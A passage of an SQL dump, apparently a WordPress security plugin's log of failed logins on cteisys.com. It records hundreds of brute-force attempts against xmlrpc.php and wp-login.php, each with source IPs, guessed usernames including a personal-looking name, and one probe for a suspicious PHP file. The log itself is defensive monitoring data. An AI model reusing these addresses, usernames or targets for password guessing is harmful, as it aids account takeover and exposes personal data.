765260.9921,152,'aCXtiHwfD6Ahz7pLM5OFSe1R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.233.89.214',3270072790,'newd',0,1664765260.9947,152,'ajyfFOU5gQbsoB67kWKed9mw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1664765505.9787,152,'jftYvSicP4XzHQFgRNOlG70C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1664765506.0873,152,'CywIHa6A1xGl7Um432FPENKD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.59',2487801403,'newd',0,1664765764.7155,152,'9dXYAV3C54IJD71xBtkncz0m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664765764.7820,152,'6VflHJQgLwmEp52zaxU1RM7b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('135.125.207.25',2273169177,'newd',0,1664765999.9040,152,'5jQkvJNmzB3y8pF1hAtLcaY0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664767875.2864,152,'xqvQh8dOCWcf9KUYpATLRNlk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.64.218.102',574675558,'newd',0,1664767875.3818,152,'KnHSEWTk9iexmGXB3yZUNgQ4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664767895.1543,152,'oO1CymbG5BlczigDfjATsZVK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('200.150.202.196',3365325508,'newd',0,1664767898.6355,152,'6lfXB3s1cLdEgMRpoC4ImSrx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664767908.9875,152,'r2q7BQnm8tGvefld5LY1Do9u','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.66.145.163',2487390627,'newd',0,1664767909.3851,152,'d0vFp81sL3hEy9ZiIRtWfTcH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.22.153.127',1410767231,'newd',0,1664767914.3655,152,'zXSP68gvjoHLhCO53GdsEufY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664767915.2449,152,'OlaCABn4GNXuYTQvjF8MPJg9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.86.229.13',576120077,'newd',0,1664767916.8314,152,'ipUy0Ml54RqaVvkdmJsFQCth','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.226.80.84',786583636,'newd',0,1664767921.3300,152,'a5doQBX7jtfs28iRuPlqbDvk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.34.32.183',3106021559,'newd',0,1664767924.6947,152,'QqfsmNSyhGBFZYMxU1bAgc5t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664767933.9524,152,'Sokyc4qj1FbKYf6we5lRt7hH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664768094.2410,7,'smDtG0FlnbUX2Y8CvBzHOcLh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664768152.7524,152,'wVuzmHXoegnrYM8AIRlC3UcE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664768458.4113,152,'w1ky9qRYIXn6ijCeZv8uzGQb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.129.212.158',729928862,'newd',0,1664768459.0580,152,'jYk2AXxMcPuiSbsJUdo1RmFq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.77.131.169',760054697,'newd',0,1664768735.8288,152,'sR36jgNX5OnZVz2GvEHQClew','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.248.44',3488938028,'newd',0,1664769026.5837,152,'KxyNi7J9g6wOjeHdUqnuBzGW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.241.120.248',2733734136,'newd',0,1664769334.7057,152,'SKet7spLOwEv2ck3rnidZM01','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('1.116.44.97',24390753,'newd',0,1664770517.6420,152,'obFB7k9ZqpAPMESf4shC8Lxz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('202.226.37.184',3403818424,'newd',0,1664770741.3726,152,'br3X5Q7nkOwzDlFcAIfGBJs0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.29.50.200',773665480,'newd',0,1664770741.3734,152,'e1iqawRAjbZ7xHLyYsfduWpo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.85.126',3642054014,'newd',0,1664770747.9730,152,'sqAg0JPmBH9lLp1u5OoMGhjT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.104',3103917160,'newd',0,1664770753.7086,152,'c3f7vbPUl5GJCsVrqEAgzxjO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664770756.1082,152,'MpkbsORZIGYQvFtVKB7wafS0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664770759.4517,152,'Mc1XxVHvnuL7FdWr0aZ2gPpm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.207.124.111',584023151,'newd',0,1664770760.1755,152,'rjxz7JclmQdyUqGsg1IhouYn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664770768.0656,152,'NzcvJ2Vn0Gx4og97tBLHk1KD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664770770.2018,152,'cd7TayZuUgGSIbYOknwj0Jie','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1664770842.0167,152,'YhS4vet7cazTIORKXmj1y9Z3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1664770848.7282,152,'PXc1Lz5Ytedg8NibMjxTECn3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.0.73.142',1694517646,'newd',0,1664771159.5424,152,'S1XwQ5EtZ9IzGBAhjHkL64qc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1664771159.5725,152,'ScORuwxIzA8pZmeNDUn32y70','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.251.219.111',1358682991,'newd',0,1664771501.0886,152,'y1sAKon0GPIrJtO4QNzViTbw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.99.34.140',3227722380,'newd',0,1664771501.1222,152,'EHRpnukXl3TAYG68S2F7Kjzh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1664771787.9014,152,'omNEWIfBgT32PHlF0OceDASx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.46.253',3515690749,'newd',0,1664771787.9166,7,'NzOxbI3kTiJ6KogQYVcHR7eF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1664771814.6384,152,'kO6vpVIyc8gSXrztEZujoY2q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.17',1364735249,'newd',0,1664772151.6016,152,'VxZ8lDkbo0wQOTLBsKArY3uM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.119.122.23',1433893399,'newd',0,1664772485.7741,152,'xguKtqvb2EHX6wkVP8CiMpD7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'newd',0,1664772796.6892,152,'CPNevIT4QnO3SDEyY7jltsGR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1664773108.0165,152,'ViHXDm64MOIxNKryEL9jsBbz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.132.174.112',3162812016,'newd',0,1664774142.0855,152,'pJNY2K9dRbxSXvfCgH6OwW8I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1664774142.1897,152,'YkymgKqoVHPIzsOeFJ1DMpBv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.34.104.242',52586738,'newd',0,1664774459.7508,152,'YUDZfTqxd8pH7ACPIe09chmB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.171.180.165',1739306149,'newd',0,1664774479.5826,152,'JKgY2Bf05XOMGp4HVRTsAcCj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.37.194',3515688386,'newd',0,1664774747.1663,7,'EUJkDI1CveOG7TdpfBoNnSzx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('152.32.211.172',2552288172,'newd',0,1664774831.4993,152,'qsHylXTeB0zvUmNifJF6xpGK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.69.26.40',2655328808,'newd',0,1664775158.6972,152,'gh8P3oSs4E5H7nCXUVj0zqBR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1664775159.2134,152,'voymKb2zAtNVPLrskap6BT1c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1664775493.2262,152,'7jfqdm0ZBetMwLPHNEyc9ou2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.110.84.132',1735283844,'newd',0,1664775505.3436,152,'fDgbNzOmQlrISk0j4oZC3RL6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1664775853.2096,152,'rL9f4b7dshQxv2SPCa3FgByi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.189.63',1753464127,'newd',0,1664776208.8552,152,'epaciUqZutsWhPGv5JwFLnjm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.132.174.112',3162812016,'newd',0,1664776215.5315,152,'ZsbzIPLtGl8T0mS4hB7Y1cgM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1664776560.1112,152,'A8cNCY10OhPT9dsi3tpImJu7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.158.112',1208589936,'newd',0,1664776567.0626,152,'PSt4eFGKAUmcHZzd6IogusYl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.203.69.223',1959478751,'newd',0,1664778271.9819,152,'MkNuPZtiWGClns8hrHqI6L5j','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.69.15.37',3645181733,'newd',0,1664778278.0511,152,'2dR3VLHiwoljGkSse7qxINDQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.25',90545433,'newd',0,1664778426.8041,152,'kWMzb24gjX5DKAecxqIhiQ0l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.136.54.132',3330815620,'newd',0,1664778426.8057,152,'aM6kp0dgEtOqIBPA3HnUCVZj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.149.77.114',764759410,'newd',0,1664778799.8804,152,'ZYJF9kLAUM1teglxhDEpVNBu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.153.50.250',2207855354,'newd',0,1664778799.8804,152,'arSZkey7dhVzuLgW5GqY9JoC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.62.213.234',2990462442,'newd',0,1664779052.9002,152,'nbIs5koL3w2P4tXUYaVHAl0C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.207.63',2160578367,'newd',0,1664779052.9125,152,'MveyAYHuq6TfVxiJw35hQrpd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.239.172.7',3002051591,'newd',0,1664779053.0045,152,'OGhvR7Hg392r5LCoKJm6IsnE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.47.46.81',1311714897,'newd',0,1664779062.3906,152,'jkd28cpirfbqtsHC96TKD5hW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664779062.8485,152,'iK9S2AefysLtrGOJ4YRgjEd3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.250.116.85',3640292437,'newd',0,1664779173.6486,152,'182rNj3iFUO7RuVX5YTs9Mdc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664779173.6975,152,'rxXHRBUhD2jmWCkbTuM9VnL3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.64.237.75',1077996875,'newd',0,1664779234.8146,152,'dMw0S54UpfNBV3cPmbxrTY6g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.119.187',2682222523,'newd',0,1664779235.6161,152,'QzryjsuG3CtOTVnhJXLpcDZN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.7.190.241',2634530545,'admin',0,1664779242.5506,152,'GBVxP30zJtC1gHnLeFyrWkcI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.68.11.239',860097519,'admin',0,1664779244.4195,152,'q60FjwrKAnuzotHUVsTSg5ZE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'ahahotels',0,1664779248.8677,152,'hVP2r0ZpXOeAqQn931bYMfKm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('78.47.46.81',1311714897,'admin',0,1664779250.3292,152,'R3ONlg5d7GaWT9Yq6oxswXKA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.193.51',2310586675,'admin',0,1664779251.0703,152,'N4te0B5v1rgcYyzmCEjVbSiG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.52.67.200',1093944264,'admin',0,1664779254.5236,152,'1wIbCHYT9EZnGkmlOAVXcgaB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'admin',0,1664779270.2414,152,'ivjzL3GwaqXcMl2AP6HZIKpO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.184.155.89',1505270617,'admin',0,1664779273.2641,152,'IODc1qvMXsQ4bHZh3GFoN08A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1664779535.8915,152,'SpXCfleyVmiFx9HRNO3h4jq6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1664779540.7157,152,'BSUkPT0ErY2Azw4unh6QNf7K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.51.200',1737569224,'newd',0,1664779969.3775,152,'D1RZStEyaG2hKY6NdfAW3cCn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.214.59',2487801403,'newd',0,1664780301.1701,152,'s2KqW4xY8yNVB7RvHElMmwTu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.143.236',1137545196,'newd',0,1664780310.8454,152,'TVPqAJU3Nsf7rwblpCnKWd1D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.38.163.180',2586223540,'admin',0,1664782256.2044,152,'dyF1bNH7BTrfpuzDZSAhn2Rv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.225.76.130',3286322306,'admin',0,1664782266.9897,152,'diqOwutKhIpAyGrXJ6YRjnQU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.244.254',2487809278,'admin',0,1664782653.2484,152,'DeoEan8NZCcb5pzWfO4wRgiL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664783042.6670,152,'0ivCbs4jN2TApJqWDflXead3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.217.77',2732054861,'newd',0,1664783048.3081,152,'bJiVsW9KoHnQpU2ILaqtcO6B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.158.230.167',3634292391,'newd',0,1664783424.1410,152,'txJ6LlIiE9CG7OhA1YD8qgUZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.156.168',3265502376,'newd',0,1664783445.0645,152,'2z0ogLZOFxAThwJ9Mc4vPIt1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1664783814.7926,152,'Bb8LEgPzVYSGDc3sMlwn6Z54','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664783815.4025,152,'F5ofkTjlwsSxtN28GJ74WaMd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.36',1868207652,'newd',0,1664784625.9490,152,'9wli1v0GupxWSNCOYP3sQJ6U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.229.214.93',786814557,'newd',0,1664784626.0818,152,'Jy51QXeVx9nbqd3YROTzNKvu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664785442.7867,152,'Pq4mcFIXpsvHZYTQyGLt0f7w','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.51.200',1737569224,'newd',0,1664785443.4481,152,'vzCuto5GZghBYf31iIxEnNmW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664786225.9001,152,'VqxH5Idi18rFlLNycsj67AJ3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.191',90545599,'newd',0,1664786246.4164,152,'j01fFToMUx9WmLH8tNRKcipw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.91.117.122',2421912954,'newd',0,1664786621.1724,152,'564shUotZwijuTf1SELQCpOr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'newd',0,1664787041.6209,152,'xELYdHecS8iPUqNnkawFsjDl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664787060.1292,152,'UPvjCT4G8aRA5LkteEzfmuy9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.142.136.99',864979043,'',0,1664787815.5459,55,'7XA8hey1m9PkCRdJbUjcSupa','','19|0|0|0|cteisys.com/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',0,19,0),('208.109.79.3',3496824579,'newd',0,1664788265.2013,152,'2k5eIPAfZ8ndRM3hC01mvF4t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.74.145.155',1347064219,'newd',0,1664788265.2051,152,'0xVO18rdgUQB6EKy5WwptCmY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.69.26.40',2655328808,'newd',0,1664788268.5102,152,'KyTb1qZa9RcOwlX2Skm50Whs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.239.6.182',602867382,'newd',0,1664788272.7108,152,'5OsuxjGDIZASyMo4cF1mzQhX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664788276.7556,152,'nd7DUkNsLoGBgErw5p9ySxmJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.95.107',3642056555,'newd',0,1664788277.8751,152,'1yPUXvdWRuAfCegMB7iVGb9K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.129.181.108',2508305772,'newd',0,1664788287.7226,152,'hoxpr49JeinkdjZcP1zquU6W','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.28.155.211',2501680083,'newd',0,1664788288.1565,152,'CY8Tt3chqjKvBiAURGHskLl2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.18.25.1',2232555777,'newd',0,1664788306.8908,152,'5OQqeGk78xspU4nT0DLmyYRJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.189.176.172',1539158188,'newd',0,1664788310.7366,152,'A6237kNCMwadLU9bOxD4zWQj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('59.106.13.177',996806065,'newd',0,1664788315.3997,152,'f3Fd8T0s4HJxnc7XPWgyrjCu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.125.241',3098050033,'newd',0,1664789092.7124,152,'9pOV2iJUy5h4ldS60TvzrsRM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1664789115.6301,152,'sVIUgOYWM648NT2xDy7odGuE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.156.219',90545371,'newd',0,1664789527.6703,152,'ScC6xkelgYsO2Ipq0DWtrand','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.31.171',2680889259,'newd',0,1664789534.0900,152,'67FQJwIVZSg2U5fndiCr8HOt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('41.93.82.7',693981703,'newd',0,1664789923.3207,152,'Kz7ueYgBtbdxpZ28wLSWV4jM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.174.248.107',3652122731,'newd',0,1664790365.0705,152,'S1zqHOsMfbdPZV4nL0AwuGiT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.24.52.65',2014852161,'newd',0,1664790793.7281,152,'6eWwmgICYNZiy2h0Pt3M58bk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1664790793.7283,152,'0caSBJk2Yv9hKCZEAszm4LFQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.188.214',3139484886,'newd',0,1664791635.4795,152,'mqG3il2pzADeXUs1nhKdfSc8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.117.30',2335929630,'newd',0,1664792086.4060,152,'QuIJkWMX8Up2DLcj5nNwdCPY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.236.20.180',1475089588,'newd',0,1664792513.3990,152,'RObNLW5r21xg9En8KPqzBhld','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.46.121.66',3106830658,'newd',0,1664792516.0434,152,'KmUIjQsA4u0xLJCpDn3vqSFf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664792641.7870,152,'wDXVL4vQt5h9GnCrlMbSo2dU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664792641.7978,152,'MwUXZzos7RCDQ5KjSnP61EHe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.79.47.25',760164121,'newd',0,1664792641.9135,152,'BwscXKprNYeufEZbnxVDhz9S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.156.16.146',1385959570,'newd',0,1664792654.0495,152,'nRUm7YrcCq10BVpuDifs2T3o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.18.52.177',1997681841,'newd',0,1664792659.8773,152,'ar9JoUkRHVue6myEv2CQZXWO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.223.119.187',2682222523,'newd',0,1664792666.4474,152,'QEAiUNK0jWGORq3TJxmtVoDS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.29.76.78',1209879630,'newd',0,1664792958.3054,152,'7iYB9TWfbcDQuXkpzOIEUsdn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664792958.3063,152,'qZpF39EAg7MCOzGlQcJ6UDtL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.111.225.89',1601167705,'newd',0,1664793382.2627,152,'7B8vbME4WPahx16p5eZjX9YK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.95.112.79',2522837071,'newd',0,1664793787.3669,152,'sXZxQGjYeNFcI1J2A5H47mfT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.209.28',2994786588,'newd',0,1664793799.5853,152,'2HytiXscJS5DVWERGlUwmpa6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.38.40.215',3559270615,'newd',0,1664794672.9841,152,'BlA4odSJKPb9ZV5DLNnsGhaT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.9.145.140',1208586636,'newd',0,1664794678.7747,152,'1RzS3uVcsL9IX4eTD68B2qjJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664794783.0334,152,'7AfSVZhy6FIgDuRnQdB2WxJP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('84.54.23.178',1412831154,'newd',0,1664794786.7150,152,'TcX4ZUaqzY2InJ9b0HSyrB78','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.213.249.210',2731932114,'newd',0,1664794786.8253,152,'8e7wJnb5NV2udSvXgKrUWMAl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'newd',0,1664794797.3653,152,'4wxtCbqgzDj1s7JL3d2fKTuU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.198.161.92',2412159324,'newd',0,1664794807.7077,152,'MmhpO5X1aNuZjBPivdVsDUQW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.52.166',1364735142,'newd',0,1664794808.9111,152,'9vPeoaYQ2JFIswrOklZ0U4mq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.99.248.98',1482946658,'newd',0,1664794809.1909,152,'EL1HkOadl68vXzwxq4srByoA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664795149.4327,152,'BnL8dTuJy9KC3QspI6jYgPmG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('195.93.152.83',3277690963,'newd',0,1664795149.4472,152,'REheJNLTFQs8amKyIoA1Yxzg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664795578.2508,152,'HGkF2L9pyinox8MT5WUYR7O3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.149.229',2671875557,'newd',0,1664795578.2509,152,'lb2EVYy0hjSZ5i6OAGgcFDfp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.139.178.177',2475406001,'newd',0,1664796023.9629,152,'5g9zUaI3YXf0EuBH4rxPAyvi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.121.252',3451484668,'nathaniel-lipka',0,1664796454.0417,51,'pRKYvAd8jWTxBN0rbEMi2e3C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664796454.8081,152,'aMDQdWs1PpvTGVolmRJquhKO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.29.249',2112036345,'newd',0,1664796455.9992,152,'uhzMLnJkebEq7ty36PFY5iUx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.120.192',1732933824,'newd',0,1664796932.6274,152,'ZYt7rMa2gq5O8zx6ov9CclGL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664797353.5206,152,'Y1IamWlQKbEzN8BCfktFR7rj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.76.135.15',2018281231,'newd',0,1664797353.5592,152,'JTmRBfK5Q2kNtwvjhrub4A07','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.79.239.127',1632628607,'newd',0,1664797800.0459,152,'T1aoWFc4R96NpnsOZwkPtV0Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664797802.5055,152,'rapzP2SqDTKg8567Mkf3EG4N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664798128.7079,152,'Ng49uz2BkhqWbQpOsGCTnfPK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.62.213.234',2990462442,'newd',0,1664798131.2977,152,'gqw9b7X1BKWlfVI0x4zu3ipk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'newd',0,1664798139.0198,152,'RP8mpijb1QuFXy7GDrgqoVcx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.168.95',2388502623,'newd',0,1664798141.4720,152,'wgGImVPnzi20Uqd6DsCLrcJ8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.210.145.8',3117584648,'newd',0,1664798148.8832,152,'HoCzgFle7cw4fTZnPkItAp8m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664798149.9116,152,'fNzQAbp5wOGcWhI2nE3rd1eV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.69.15.37',3645181733,'newd',0,1664798150.2065,152,'WQM1gfvIJUPFaorN8RzK23d5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.245.71.145',2650097553,'newd',0,1664798162.3292,152,'Dg0aNZ5mfVW6Is3b7xltKBrU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,